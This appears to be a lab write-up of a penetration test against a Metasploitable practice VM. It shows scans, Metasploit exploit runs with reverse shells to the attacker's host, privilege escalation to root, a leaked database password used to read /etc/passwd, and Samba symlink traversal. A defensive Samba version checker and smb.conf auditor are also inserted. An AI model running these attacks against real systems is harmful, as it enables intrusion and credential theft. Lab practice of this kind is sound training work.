# Environment setup

After downloading it, drop it into a VM. Bridged mode is enabled by default, so it can be used as-is.

Account / password: msfadmin/msfadmin

Log in and run ifconfig to check the IP: 192.168.74.128

Ready to go.

# Service identification

```
C:\WINDOWS\system32>nmap 192.168.74.128 -sS -T4 -p-
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 20:22 中国标准时间
Nmap scan report for 192.168.74.128
Host is up (0.00035s latency).
Not shown: 65522 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
3632/tcp open  distccd
5432/tcp open  postgresql
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 00:0C:29:BA:A0:B5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.81 seconds
```

Port 80 is open, so I took a quick look: nothing there.

Since 80 is open, I'd naturally poke at it by hand first, as practice. Honestly, in a real engagement I'd probably go straight to a full vulnerability scan.

Let's run dirsearch to enumerate paths:

```
D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch>dirsearch -u http://192.168.74.128
dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch\reports\http_192.168.74.128\_24-04-01_20-13-18.txt

Target: http://192.168.74.128/

[20:13:18] Starting:
[20:13:23] 403 -  332B  - /.ht_wsr.txt
[20:13:24] 403 -  335B  - /.htaccess.bak1
[20:13:24] 403 -  335B  - /.htaccess.orig
[20:13:24] 403 -  335B  - /.htaccess.save
[20:13:24] 403 -  337B  - /.htaccess.sample
[20:13:24] 403 -  336B  - /.htaccess_extra
[20:13:24] 403 -  333B  - /.htaccessBAK
[20:13:24] 403 -  335B  - /.htaccess_orig
[20:13:24] 403 -  334B  - /.htaccessOLD2
[20:13:24] 403 -  333B  - /.htaccess_sc
[20:13:24] 403 -  333B  - /.htaccessOLD
[20:13:24] 403 -  325B  - /.htm
[20:13:24] 403 -  331B  - /.htpasswds
[20:13:24] 403 -  335B  - /.htpasswd_test
[20:13:24] 403 -  332B  - /.httr-oauth
[20:13:24] 403 -  326B  - /.html
[20:14:12] 403 -  329B  - /cgi-bin/
[20:14:26] 403 -  325B  - /doc/
[20:14:26] 403 -  329B  - /doc/api/
[20:14:27] 403 -  340B  - /doc/en/changes.html
[20:14:27] 403 -  340B  - /doc/html/index.html
[20:14:27] 403 -  339B  - /doc/stable.version
[20:15:16] 200 -   48KB - /phpinfo
[20:15:16] 200 -   48KB - /phpinfo.php
[20:15:37] 403 -  334B  - /server-status
[20:15:37] 403 -  335B  - /server-status/
[20:15:59] 301 -  357B  - /tikiwiki  ->  http://192.168.74.128/tikiwiki/
```

There's a phpinfo page, and a new directory called tikiwiki.

# Exploitation

# tikiwiki RCE

Since this is Metasploit's own practice target, the moment I saw tikiwiki I went straight to searching for the matching exploit.

```
msf6 > search tikiwiki

Matching Modules
================

   #  Name                                             Disclosure Date  Rank       Check  Description
   -  ----                                             ---------------  ----       -----  -----------
   0  exploit/unix/webapp/php_xmlrpc_eval              2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution
   1  exploit/unix/webapp/tikiwiki_upload_exec         2016-07-11       excellent  Yes    Tiki Wiki Unauthenticated File Upload Vulnerability
   2  exploit/unix/webapp/tikiwiki_unserialize_exec    2012-07-04       excellent  No     Tiki Wiki unserialize() PHP Code Execution
   3  auxiliary/admin/tikiwiki/tikidblib               2006-11-01       normal     No     TikiWiki Information Disclosure
   4  exploit/unix/webapp/tikiwiki_jhot_exec           2006-09-02       excellent  Yes    TikiWiki jhot Remote Command Execution
   5  exploit/unix/webapp/tikiwiki_graph_formula_exec  2007-10-10       excellent  Yes    TikiWiki tiki-graph_formula Remote PHP Code Execution


Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/webapp/tikiwiki_graph_formula_exec
```

That's 4 RCEs, one file upload and one information disclosure. I'll go through each module with info in a bit.

Let's just try one of the RCEs and see.

All 5 tikiwiki modules failed. Some don't support the payload; the formula one should in theory work, but for some reason it doesn't. Maybe my VM configuration is off? It shouldn't be, though. I'll revisit it later.

I looked into it a bit. The module author has replied under related issues saying it may come down to the exploit's bad characters and the encoder: the encoder can't fully work around the bad characters while preserving the intended functionality, so he suggests trying other payloads. But other people's write-ups show this vulnerability being exploited successfully. Possibly it's because I'm running the latest Metasploit v6, where the encoders may have been reworked and some old modules never got adapted accordingly. (Just my guess.)

# samba

It also has ports 139 and 445 open, so let's check the exact version.

```
C:\WINDOWS\system32>nmap -sV 192.168.74.128 -p 445
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 15:32 中国标准时间
Nmap scan report for 192.168.209.68
Host is up (0.00088s latency).

PORT    STATE SERVICE     VERSION
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:BA:A0:B5 (VMware)
```

We have version info. If the Samba version is in the 3.0.20 to 3.0.25rc3 range, CVE-2007-2447 can be used to exploit it.
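As an added example (not from the original post), a small Python triage helper for the version check above: it pulls the exact Samba version out of a banner and compares it with the CVE-2007-2447 range, handling the rc suffix so that 3.0.25rc3 counts as affected but 3.0.25 does not. The two banner strings are constructed copies of the nmap line above and the enum4linux srvinfo line further down; note that nmap's fuzzy "3.X - 4.X" alone is not enough for a verdict.

```python
import re
from typing import Optional

# Affected range quoted in the post for CVE-2007-2447 (Samba "username map script").
AFFECTED_MIN = "3.0.20"
AFFECTED_MAX = "3.0.25rc3"

# Constructed sample banners, shaped like the nmap -sV line and the enum4linux
# srvinfo line in this write-up. nmap only gave a fuzzy "3.X - 4.X" here.
NMAP_LINE = "445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)"
SRVINFO_LINE = ("METASPLOITABLE Wk Sv PrQ Unx NT SNT metasploitable server "
                "(Samba 3.0.20-Debian)")

_EXACT_VERSION = re.compile(r"Samba (?:smbd )?(\d+\.\d+\.\d+(?:rc\d+)?)")
_VERSION_PARTS = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?")


def parse_version(banner: str) -> Optional[str]:
    """Exact Samba version from a banner, or None when the banner is fuzzy ("3.X - 4.X")."""
    m = _EXACT_VERSION.search(banner)
    return m.group(1) if m else None


def version_key(version: str) -> tuple:
    """Sort key where a release candidate sorts before its final release:
    3.0.25rc3 -> (3, 0, 25, 0, 3) and 3.0.25 -> (3, 0, 25, 1, 0)."""
    m = _VERSION_PARTS.fullmatch(version)
    if m is None:
        raise ValueError(f"unrecognised Samba version: {version!r}")
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), 0 if rc else 1, int(rc or 0))


def is_affected(version: str) -> bool:
    """True when version lies inside [AFFECTED_MIN, AFFECTED_MAX] inclusive."""
    return version_key(AFFECTED_MIN) <= version_key(version) <= version_key(AFFECTED_MAX)


def triage(banner: str) -> str:
    """One-line verdict for a banner; an inexact banner gives no verdict."""
    version = parse_version(banner)
    if version is None:
        return "undetermined: no exact version in banner, get one from srvinfo/smbclient"
    return f"Samba {version}: {'affected' if is_affected(version) else 'not affected'}"


if __name__ == "__main__":
    for line in (NMAP_LINE, SRVINFO_LINE):
        print(triage(line))
```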

Let's try the samba module:

```
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.74.128
RHOSTS => 192.168.74.128
msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 192.168.2.225:4444
[*] Command shell session 2 opened (192.168.2.225:4444 -> 192.168.74.128:59869) at 2024-04-01 20:58:55 +0800

id
uid=0(root) gid=0(root)
```

Got a root shell.

# tikiwiki database leak

The earlier exploit couldn't be used because of the version issue. I couldn't be bothered to download the v4 msf, so I tried other modules.

Tried the DB disclosure module:

```
msf6 auxiliary(admin/tikiwiki/tikidblib) > run
[*] Running module against 192.168.209.68

[*] Establishing a connection to the target...
[*] Get information about database...
[*] Install path : /var/www/tikiwiki/lib/tikidblib.php
[*] DB type      : mysql
[*] DB name      : tikiwiki195
[*] DB host      : localhost
[*] DB user      : root
[*] DB password  : root
[*] Auxiliary module execution completed
```

We have the database account and password. Connecting to it directly lets us read system files:

```
mysql -h 192.168.1.105 -u root -p
root
show databases;
use mysql
show tables;
select User, Password from user;
select load_file('/etc/passwd');
```

# postgresql exploitation

Port 5432 is open; check the version.

```
C:\WINDOWS\system32>nmap -sV 192.168.74.128 -p 5432
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 16:30 中国标准时间
Nmap scan report for bogon (192.168.74.128)
Host is up (0.00013s latency).

PORT     STATE SERVICE    VERSION
5432/tcp open  postgresql PostgreSQL DB 8.3.0 - 8.3.7
MAC Address: 00:0C:29:BA:A0:B5 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.37 seconds
```

Look up the exploit modules in Metasploit:

```
msf6 > search name:postgresql version:8

Matching Modules
================

   #  Name                                                        Disclosure Date  Rank       Check  Description
   -  ----                                                        ---------------  ----       -----  -----------
   0  auxiliary/server/capture/postgresql                                          normal     No     Authentication Capture: PostgreSQL
   1  exploit/multi/postgres/postgres_copy_from_program_cmd_exec  2019-03-20       excellent  Yes    PostgreSQL COPY FROM PROGRAM Command Execution
   2  exploit/multi/postgres/postgres_createlang                  2016-01-01       good       Yes    PostgreSQL CREATE LANGUAGE Execution
   3  auxiliary/scanner/postgres/postgres_dbname_flag_injection                    normal     No     PostgreSQL Database Name Command Line Flag Injection
   4  auxiliary/scanner/postgres/postgres_login                                    normal     No     PostgreSQL Login Utility
   5  auxiliary/admin/postgres/postgres_readfile                                   normal     No     PostgreSQL Server Generic Query
   6  auxiliary/admin/postgres/postgres_sql                                        normal     No     PostgreSQL Server Generic Query
   7  auxiliary/scanner/postgres/postgres_version                                  normal     No     PostgreSQL Version Probe
   8  exploit/linux/postgres/postgres_payload                     2007-06-05       excellent  Yes    PostgreSQL for Linux Payload Execution
   9  exploit/windows/postgres/postgres_payload                   2009-04-10       excellent  Yes    PostgreSQL for Microsoft Windows Payload Execution


Interact with a module by name or index. For example info 9, use 9 or use exploit/windows/postgres/postgres_payload
```

Number 8 gives a shell directly; let's go.

```
msf6 exploit(linux/postgres/postgres_payload) > use 8
[*] Using configured payload linux/x86/meterpreter/reverse_tcp

# configuration omitted

msf6 exploit(linux/postgres/postgres_payload) > run

[*] Started reverse TCP handler on 192.168.74.1:4444
[*] 192.168.74.128:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/ViEXhZas.so, should be cleaned up automatically
[*] Sending stage (1017704 bytes) to 192.168.74.128
[*] Meterpreter session 2 opened (192.168.74.1:4444 -> 192.168.74.128:51664) at 2024-04-02 16:36:20 +0800

meterpreter >
```

Got a meterpreter session.

Check the privileges:

```
meterpreter > getuid
Server username: postgres
```

Low privileges, so on to privilege escalation.

Some research shows this kernel version has a local privilege escalation vulnerability: Linux udev Netlink Local Privilege Escalation.

Exploit it:

```
meterpreter > bg
[*] Backgrounding session 2...
msf6 exploit(linux/postgres/postgres_payload) > use exploit/linux/local/udev_netlink
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/local/udev_netlink) > set LHOST 192.168.74.1
LHOST => 192.168.74.1
msf6 exploit(linux/local/udev_netlink) > set SESSION 2
SESSION => 2
msf6 exploit(linux/local/udev_netlink) > run

[*] Started reverse TCP handler on 192.168.74.1:4444
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2994
[+] Found netlink pid: 2993
[*] Writing payload executable (207 bytes) to /tmp/cTXcvwGutp
[*] Writing exploit executable (1879 bytes) to /tmp/DaZonJcalG
[*] chmod'ing and running it...
[*] Sending stage (1017704 bytes) to 192.168.74.128
[*] Meterpreter session 3 opened (192.168.74.1:4444 -> 192.168.74.128:42669) at 2024-04-02 16:40:14 +0800

meterpreter > getuid
Server username: root
```

Root obtained.

# SMB enumeration and directory traversal

This Samba version has another vulnerability, Samba Symlink Directory Traversal, which is a directory traversal.

Kali's enum4linux tool can enumerate information from the SMB service. By default it runs every check, so there's a lot of output, including usernames, share information and so on.

```
┌──(root㉿kali)-[~/Desktop]
└─# enum4linux 192.168.74.128
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Apr  2 08:07:18 2024

 =========================================( Target Information )=========================================

Target ........... 192.168.74.128
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.74.128 )===========================


[+] Got domain/workgroup name: WORKGROUP


 ===============================( Nbtstat Information for 192.168.74.128 )===============================

Looking up status of 192.168.74.128
        METASPLOITABLE  <00> -         B <ACTIVE>  Workstation Service
        METASPLOITABLE  <03> -         B <ACTIVE>  Messenger Service
        METASPLOITABLE  <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ==================================( Session Check on 192.168.74.128 )==================================


[+] Server 192.168.74.128 allows sessions using username '', password ''


 ===============================( Getting domain SID for 192.168.74.128 )===============================

Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup


 ==================================( OS information on 192.168.74.128 )==================================


[E] Can't get OS info with smbclient

[+] Got OS info for 192.168.74.128 from srvinfo:
        METASPLOITABLE Wk Sv PrQ Unx NT SNT metasploitable server (Samba 3.0.20-Debian)
        platform_id     :       500
        os version      :       4.9
        server type     :       0x9a03


 ======================================( Users on 192.168.74.128 )======================================

index: 0x1 RID: 0x3f2 acb: 0x00000011 Account: games    Name: games     Desc: (null)
index: 0x2 RID: 0x1f5 acb: 0x00000011 Account: nobody   Name: nobody    Desc: (null)
index: 0x3 RID: 0x4ba acb: 0x00000011 Account: bind     Name: (null)    Desc: (null)
index: 0x4 RID: 0x402 acb: 0x00000011 Account: proxy    Name: proxy     Desc: (null)
index: 0x5 RID: 0x4b4 acb: 0x00000011 Account: syslog   Name: (null)    Desc: (null)
index: 0x6 RID: 0xbba acb: 0x00000010 Account: user     Name: just a user,111,, Desc: (null)
index: 0x7 RID: 0x42a acb: 0x00000011 Account: www-data Name: www-data  Desc: (null)
index: 0x8 RID: 0x3e8 acb: 0x00000011 Account: root     Name: root      Desc: (null)
index: 0x9 RID: 0x3fa acb: 0x00000011 Account: news     Name: news      Desc: (null)
index: 0xa RID: 0x4c0 acb: 0x00000011 Account: postgres Name: PostgreSQL administrator,,,       Desc: (null)
index: 0xb RID: 0x3ec acb: 0x00000011 Account: bin      Name: bin       Desc: (null)
index: 0xc RID: 0x3f8 acb: 0x00000011 Account: mail     Name: mail      Desc: (null)
index: 0xd RID: 0x4c6 acb: 0x00000011 Account: distccd  Name: (null)    Desc: (null)
index: 0xe RID: 0x4ca acb: 0x00000011 Account: proftpd  Name: (null)    Desc: (null)
index: 0xf RID: 0x4b2 acb: 0x00000011 Account: dhcp     Name: (null)    Desc: (null)
index: 0x10 RID: 0x3ea acb: 0x00000011 Account: daemon  Name: daemon    Desc: (null)
index: 0x11 RID: 0x4b8 acb: 0x00000011 Account: sshd    Name: (null)    Desc: (null)
index: 0x12 RID: 0x3f4 acb: 0x00000011 Account: man     Name: man       Desc: (null)
index: 0x13 RID: 0x3f6 acb: 0x00000011 Account: lp      Name: lp        Desc: (null)
index: 0x14 RID: 0x4c2 acb: 0x00000011 Account: mysql   Name: MySQL Server,,,   Desc: (null)
index: 0x15 RID: 0x43a acb: 0x00000011 Account: gnats   Name: Gnats Bug-Reporting System (admin)        Desc: (null)
index: 0x16 RID: 0x4b0 acb: 0x00000011 Account: libuuid Name: (null)    Desc: (null)
index: 0x17 RID: 0x42c acb: 0x00000011 Account: backup  Name: backup    Desc: (null)
index: 0x18 RID: 0xbb8 acb: 0x00000010 Account: msfadmin        Name: msfadmin,,,       Desc: (null)
index: 0x19 RID: 0x4c8 acb: 0x00000011 Account: telnetd Name: (null)    Desc: (null)
index: 0x1a RID: 0x3ee acb: 0x00000011 Account: sys     Name: sys       Desc: (null)
index: 0x1b RID: 0x4b6 acb: 0x00000011 Account: klog    Name: (null)    Desc: (null)
index: 0x1c RID: 0x4bc acb: 0x00000011 Account: postfix Name: (null)    Desc: (null)
index: 0x1d RID: 0xbbc acb: 0x00000011 Account: service Name: ,,,       Desc: (null)
index: 0x1e RID: 0x434 acb: 0x00000011 Account: list    Name: Mailing List Manager      Desc: (null)
index: 0x1f RID: 0x436 acb: 0x00000011 Account: irc     Name: ircd      Desc: (null)
index: 0x20 RID: 0x4be acb: 0x00000011 Account: ftp     Name: (null)    Desc: (null)
index: 0x21 RID: 0x4c4 acb: 0x00000011 Account: tomcat55        Name: (null)    Desc: (null)
index: 0x22 RID: 0x3f0 acb: 0x00000011 Account: sync    Name: sync      Desc: (null)
index: 0x23 RID: 0x3fc acb: 0x00000011 Account: uucp    Name: uucp      Desc: (null)

user:[games] rid:[0x3f2]
user:[nobody] rid:[0x1f5]
user:[bind] rid:[0x4ba]
user:[proxy] rid:[0x402]
user:[syslog] rid:[0x4b4]
user:[user] rid:[0xbba]
user:[www-data] rid:[0x42a]
user:[root] rid:[0x3e8]
user:[news] rid:[0x3fa]
user:[postgres] rid:[0x4c0]
user:[bin] rid:[0x3ec]
user:[mail] rid:[0x3f8]
user:[distccd] rid:[0x4c6]
user:[proftpd] rid:[0x4ca]
user:[dhcp] rid:[0x4b2]
user:[daemon] rid:[0x3ea]
user:[sshd] rid:[0x4b8]
user:[man] rid:[0x3f4]
user:[lp] rid:[0x3f6]
user:[mysql] rid:[0x4c2]
user:[gnats] rid:[0x43a]
user:[libuuid] rid:[0x4b0]
user:[backup] rid:[0x42c]
user:[msfadmin] rid:[0xbb8]
user:[telnetd] rid:[0x4c8]
user:[sys] rid:[0x3ee]
user:[klog] rid:[0x4b6]
user:[postfix] rid:[0x4bc]
user:[service] rid:[0xbbc]
user:[list] rid:[0x434]
user:[irc] rid:[0x436]
user:[ftp] rid:[0x4be]
user:[tomcat55] rid:[0x4c4]
user:[sync] rid:[0x3f0]
user:[uucp] rid:[0x3fc]

 ================================( Share Enumeration on 192.168.74.128 )================================


        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk
        IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            METASPLOITABLE

[+] Attempting to map shares on 192.168.74.128

//192.168.74.128/print$ Mapping: DENIED Listing: N/A Writing: N/A
//192.168.74.128/tmp    Mapping: OK Listing: OK Writing: N/A
//192.168.74.128/opt    Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//192.168.74.128/IPC$   Mapping: N/A Listing: N/A Writing: N/A
//192.168.74.128/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A

 ===========================( Password Policy Information for 192.168.74.128 )===========================



[+] Attaching to 192.168.74.128 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] METASPLOITABLE
        [+] Builtin

[+] Password Info for Domain: METASPLOITABLE

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: Not Set
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes
        [+] Locked Account Duration: 30 minutes
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: Not Set



[+] Retieved partial password policy with rpcclient:


Password Complexity: Disabled
Minimum Password Length: 0


 ======================================( Groups on 192.168.74.128 )======================================


[+] Getting builtin groups:


[+]  Getting builtin group memberships:


[+]  Getting local groups:


[+]  Getting local group memberships:


[+]  Getting domain groups:


[+]  Getting domain group memberships:


 =================( Users on 192.168.74.128 via RID cycling (RIDS: 500-550,1000-1050) )=================


[I] Found new SID:
S-1-5-21-1042354039-2475377354-766472396

[+] Enumerating users using SID S-1-5-21-1042354039-2475377354-766472396 and logon username '', password ''

S-1-5-21-1042354039-2475377354-766472396-500 METASPLOITABLE\Administrator (Local User)
S-1-5-21-1042354039-2475377354-766472396-501 METASPLOITABLE\nobody (Local User)
S-1-5-21-1042354039-2475377354-766472396-512 METASPLOITABLE\Domain Admins (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-513 METASPLOITABLE\Domain Users (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-514 METASPLOITABLE\Domain Guests (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1000 METASPLOITABLE\root (Local User)
S-1-5-21-1042354039-2475377354-766472396-1001 METASPLOITABLE\root (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1002 METASPLOITABLE\daemon (Local User)
S-1-5-21-1042354039-2475377354-766472396-1003 METASPLOITABLE\daemon (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1004 METASPLOITABLE\bin (Local User)
S-1-5-21-1042354039-2475377354-766472396-1005 METASPLOITABLE\bin (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1006 METASPLOITABLE\sys (Local User)
S-1-5-21-1042354039-2475377354-766472396-1007 METASPLOITABLE\sys (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1008 METASPLOITABLE\sync (Local User)
S-1-5-21-1042354039-2475377354-766472396-1009 METASPLOITABLE\adm (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1010 METASPLOITABLE\games (Local User)
S-1-5-21-1042354039-2475377354-766472396-1011 METASPLOITABLE\tty (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1012 METASPLOITABLE\man (Local User)
S-1-5-21-1042354039-2475377354-766472396-1013 METASPLOITABLE\disk (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1014 METASPLOITABLE\lp (Local User)
S-1-5-21-1042354039-2475377354-766472396-1015 METASPLOITABLE\lp (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1016 METASPLOITABLE\mail (Local User)
S-1-5-21-1042354039-2475377354-766472396-1017 METASPLOITABLE\mail (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1018 METASPLOITABLE\news (Local User)
S-1-5-21-1042354039-2475377354-766472396-1019 METASPLOITABLE\news (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1020 METASPLOITABLE\uucp (Local User)
S-1-5-21-1042354039-2475377354-766472396-1021 METASPLOITABLE\uucp (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1025 METASPLOITABLE\man (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1026 METASPLOITABLE\proxy (Local User)
S-1-5-21-1042354039-2475377354-766472396-1027 METASPLOITABLE\proxy (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1031 METASPLOITABLE\kmem (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1041 METASPLOITABLE\dialout (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1043 METASPLOITABLE\fax (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1045 METASPLOITABLE\voice (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1049 METASPLOITABLE\cdrom (Domain Group)

 ==============================( Getting printer info for 192.168.74.128 )==============================

No printers returned.


enum4linux complete on Tue Apr  2 08:07:28 2024
```

Metasploit can do the same:

```
msf6 > search samba_symlink

Matching Modules
================

   #  Name                                         Disclosure Date  Rank    Check  Description
   -  ----                                         ---------------  ----    -----  -----------
   0  auxiliary/admin/smb/samba_symlink_traversal                   normal  No     Samba Symlink Directory Traversal


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/smb/samba_symlink_traversal

msf6 > use 0
msf6 auxiliary(admin/smb/samba_symlink_traversal) > set RHOSTS 192.168.74.128
RHOSTS => 192.168.74.128
msf6 auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp
SMBSHARE => tmp
msf6 auxiliary(admin/smb/samba_symlink_traversal) > run
[*] Running module against 192.168.74.128

[*] 192.168.74.128:445 - Connecting to the server...
[*] 192.168.74.128:445 - Trying to mount writeable share 'tmp'...
[*] 192.168.74.128:445 - Trying to link 'rootfs' to the root filesystem...
[*] 192.168.74.128:445 - Now access the following share to browse the root filesystem:
[*] 192.168.74.128:445 -        \\192.168.74.128\tmp\rootfs\

[*] Auxiliary module execution completed
```

Now we can traverse directories: connecting over SMB and accessing \rootfs\ is equivalent to accessing the root directory, and you could try writing an SSH key from there.
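An added example, not part of the original post: a Python audit of an smb.conf for the two settings behind the Samba weaknesses used in this write-up, a username map script (the CVE-2007-2447 code path) and a writable share while wide links is left at its Samba 3.0 default of yes (what lets a client-created symlink such as rootfs resolve outside the share). The smb.conf fragments are constructed, not Metasploitable's real file; the share names only mirror the enum4linux listing above, and the second fragment shows the hardened form (wide links = no, script removed).

```python
import configparser
import io

# Constructed smb.conf fragment (not Metasploitable's real file), written to reproduce
# the two weaknesses this post exercises: a "username map script" in [global] and an
# anonymously writable share while "wide links" is left at its Samba 3.0 default (yes).
WEAK_SMB_CONF = """\
[global]
workgroup = WORKGROUP
server string = metasploitable server
username map script = /etc/samba/scripts/mapusers.sh

[tmp]
comment = oh noes!
path = /tmp
read only = no
guest ok = yes

[opt]
path = /opt
read only = yes
"""

# The same file with the two fixes the findings below recommend applied.
HARDENED_SMB_CONF = """\
[global]
workgroup = WORKGROUP
server string = metasploitable server
wide links = no

[tmp]
comment = oh noes!
path = /tmp
read only = no
guest ok = yes

[opt]
path = /opt
read only = yes
"""


def _yes(value, default):
    """smb.conf boolean: yes/true/1 or no/false/0; `default` is Samba's own default."""
    if value is None:
        return default
    return value.strip().lower() in ("yes", "true", "1")


def _share_writable(share):
    """'read only' wins when present; otherwise 'writable'/'writeable' (default no)."""
    if share.get("read only") is not None:
        return not _yes(share.get("read only"), True)
    return _yes(share.get("writable"), False) or _yes(share.get("writeable"), False)


def audit_smb_conf(text):
    """Return (section, issue, fix) findings for the settings this post's attacks rely on."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_file(io.StringIO(text))
    glob = cp["global"] if cp.has_section("global") else {}
    findings = []

    if glob.get("username map script"):
        findings.append(("global",
                         "username map script is set; on Samba 3.0.20-3.0.25rc3 this is "
                         "the CVE-2007-2447 code path",
                         "remove the script and upgrade Samba"))

    # Samba 3.0.x defaults: unix extensions = yes, wide links = yes. Together they let
    # a symlink created by a client resolve to paths outside the share.
    traversal = _yes(glob.get("wide links"), True) and _yes(glob.get("unix extensions"), True)
    for name in cp.sections():
        if name == "global":
            continue
        share = cp[name]
        if traversal and _share_writable(share):
            who = "anonymous" if _yes(share.get("guest ok"), False) else "authenticated"
            findings.append((name,
                             f"writable share ({who} access) with wide links = yes: a symlink "
                             "placed in it can expose the root filesystem",
                             "set wide links = no in [global]"))
    return findings


if __name__ == "__main__":
    for section, issue, fix in audit_smb_conf(WEAK_SMB_CONF):
        print(f"[{section}] {issue} -> {fix}")
```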

# distcc command execution

Port 3632 is open with a distcc service; let's check the exact version.

```
C:\WINDOWS\system32>nmap -p 3632 -sV 192.168.74.128
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 20:24 中国标准时间
Nmap scan report for 192.168.74.128
Host is up (0.00s latency).

PORT     STATE SERVICE VERSION
3632/tcp open  distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
MAC Address: 00:0C:29:BA:A0:B5 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.06 seconds
```

Search for an attack module:

```
msf6 auxiliary(admin/smb/samba_symlink_traversal) > search name:distcc

Matching Modules
================

   #  Name                           Disclosure Date  Rank       Check  Description
   -  ----                           ---------------  ----       -----  -----------
   0  exploit/unix/misc/distcc_exec  2002-02-01       excellent  Yes    DistCC Daemon Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/misc/distcc_exec
```

Selected and ran it, but the attack failed:

```
msf6 exploit(unix/misc/distcc_exec) > run

[*] Started reverse TCP handler on 192.168.74.1:7777
[-] 192.168.74.128:3632 - Exploit failed: Errno::ECONNRESET An existing connection was forcibly closed by the remote host.
[*] Exploit completed, but no session was created.
```

I searched for ages on this problem without finding a reliable answer. If anyone knows, ping me.

# Tomcat

Not sure what's on port 8180; let's probe it.

```
C:\WINDOWS\system32>nmap -sV 192.168.74.128 -p 8180
